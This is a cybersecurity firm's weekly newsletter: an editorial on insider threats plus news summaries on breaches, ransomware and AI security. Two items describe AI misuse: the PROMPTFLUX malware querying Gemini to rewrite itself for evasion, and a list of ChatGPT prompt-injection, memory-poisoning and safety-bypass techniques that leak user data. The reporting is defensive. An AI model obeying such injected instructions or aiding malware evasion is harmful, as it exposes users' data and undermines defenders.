#NSBCS.099 - The Erosion of Trust: Insider Threats in Cybersecurity
The Erosion of Trust: Insider Threats in Cybersecurity
In cybersecurity, trust is the base on which defences are built. It supports relationships between organisations, their employees, and the clients who depend on them to protect sensitive data. Yet, recent incidents with rogue insiders have clearly shown how weak this base can be, possibly causing major breaches. As cybercriminals become more advanced, the main danger often comes from inside: trusted staff turning against their organisations.
Consider the case of Peter Williams, former executive at L3Harris's Trenchant cyber division. Williams pleaded guilty to stealing and selling eight zero-day exploits and trade secrets to a Russian broker between 2022 and 2025. These tools could now help adversaries launch undetected attacks on critical infrastructure. This betrayal not only harmed national security but also reduced confidence in firms handling advanced cyber tools.
Similarly, at DigitalMint, a Chicago-based company specialising in ransomware negotiations, a former employee, Kevin Tyler Martin, was indicted for running actual ransomware operations using the ALPHV/BlackCat strain. Martin allegedly used his insider knowledge to hack U.S. companies, demanding ransoms while his firm was paid to resolve such crises. This dual role highlights a serious conflict: those hired to fix threats becoming the ones who cause them. The pattern repeats with Ryan Clifford Goldberg of Sygnia Cybersecurity Services. Goldberg, stands accused of carrying out real extortions against American entities.
These cases show why trust is so important. Insider threats make up a large part of breaches. At NSB Cyber, we prioritise integrity in everything we do. As a trusted partner to many organisations across sectors, we uphold rigorous ethical standards through transparent operations. This commitment ensures we deliver reliable cybersecurity solutions, fostering long-term trust with our clients and safeguarding their digital assets effectively.
In the end, rebuilding trust requires openness and careful watch. As these rogue actors show, wrong trust can cause widespread effects, weakening global digital safety. In a time of growing cyber conflicts, trusting carefully is not optional - it's necessary for survival.
What we read this week
AI-Powered Malware PROMPTFLUX Rewrites Itself Hourly Using Gemini - Google's Threat Intelligence Group has uncovered an experimental Visual Basic Script malware called PROMPTFLUX, developed by an unknown threat actor, which leverages Google's Gemini AI model to dynamically obfuscate and modify its own code for evasion. The malware's "Thinking Robot" component queries the AI hourly for new evasion techniques, logging responses and saving obfuscated versions in the Windows Startup folder for persistence, while attempting to spread via removable drives and network shares. Although still in development and lacking full network compromise capabilities, PROMPTFLUX represents a shift towards AI-driven metamorphic threats, with similar LLM-powered malware like FRUITSHELL, PROMPTLOCK, and PROMPTSTEAL observed in use by state-sponsored actors from China, Iran, and North Korea for reconnaissance, phishing, and data exfiltration. Defences should focus on monitoring anomalous API interactions and implementing safeguards against prompt injections.
Nikkei Reveals Data Breach Affecting 17,000 Via Slack Hack - Japanese media giant Nikkei has reported a data breach originating from hacked employee Slack accounts, impacting over 17,000 individuals. The breach was discovered in September 2025 when infostealer malware on an employee's personal device stole Slack credentials, allowing unauthorised access to internal communications. Compromised data includes names, email addresses, and chat histories, but no journalistic sources or reporting details were affected. Nikkei responded by resetting passwords and notifying Japan's Personal Information Protection Commission voluntarily. This incident highlights the risks of infostealer malware, which has compromised over 270,000 Slack credentials globally. Organisations should implement multi-factor authentication for collaboration tools, perform regular device security audits, and educate staff on phishing to prevent credential theft and subsequent breaches.
Europe Experiences Surge in Ransomware and Extortion Attacks - European organisations are facing an escalating cyber threat landscape, with ransomware and extortion attacks accounting for nearly 22% of global victims, according to CrowdStrike's 2025 European Threat Landscape Report. The report notes a 13% increase in dedicated leak site entries targeting Europe, with the UK, Germany, France, Italy, and Spain being the most affected countries. Adversary groups like Scattered Spider have shortened their attack timelines to as little as 24 hours. Sectors such as manufacturing, professional services, technology, industrial engineering, and retail are particularly vulnerable. Prominent ransomware variants include Akira, LockBit, RansomHub, INC, Lynx, and Sinobi, focusing on big-game hunting tactics. Geopolitical events, including Russia's invasion of Ukraine and the Israel-Hamas conflict, have fuelled DDoS attacks, hack-and-leak operations, and defacements. Emerging trends involve AI-enhanced vishing for credential theft, fake CAPTCHA lures, malware-as-a-service, and physical threats like cryptocurrency kidnappings.
Hacker Claims Massive Data Breach at University of Pennsylvania - A hacker group has claimed a major breach at the University of Pennsylvania, alleging access to 1.2 million records of students, alumni, and donors via a compromised PennKey SSO account. The attackers gained entry to systems including VPN, Salesforce, Qlik, SAP, and SharePoint, exfiltrating data such as names, birth dates, addresses, net worth estimates, donation histories, and sensitive demographics. They sent mass emails to 700,000 recipients mocking the university's security and have published a 1.7 GB archive online. Penn has involved the FBI and third-party experts for investigation. This underscores poor security practices enabling SSO exploitation. Affected individuals should monitor for phishing and verify communications directly with the university to avoid further compromise.
ChatGPT Vulnerabilities Enable Data Leakage Through Prompt Injections - Tenable researchers have identified seven vulnerabilities in OpenAI's ChatGPT (GPT-4o and GPT-5), allowing indirect prompt injections to leak user data from memories and histories. Attacks include embedding malicious instructions in web pages for summarisation, zero-click injections via searches, one-click links, safety bypasses using Bing trackers, conversation poisoning, markdown hiding, and memory injections. These expand the attack surface of AI-integrated tools, facilitating exfiltration and unauthorised actions. Related threats encompass PromptJacking, Claude pirate, and LatentBreak jailbreaks. AI vendors should enhance safety filters like url_safe to prevent injections, while users and organisations must be cautious with AI interactions to safeguard sensitive information.
Referenceshttps://thehackernews.com/2025/11/google-uncovers-promptflux-malware-that.htmlhttps://www.securityweek.com/nikkei-says-17000-impacted-by-data-breach-stemming-from-slack-account-hack/https://www.darkreading.com/cyberattacks-data-breaches/europe-increase-ransomware-extortionhttps://www.bleepingcomputer.com/news/security/university-of-pennsylvania-hacker-claims-1.2-million-donor-data-breach/https://thehackernews.com/2025/11/researchers-find-chatgpt.html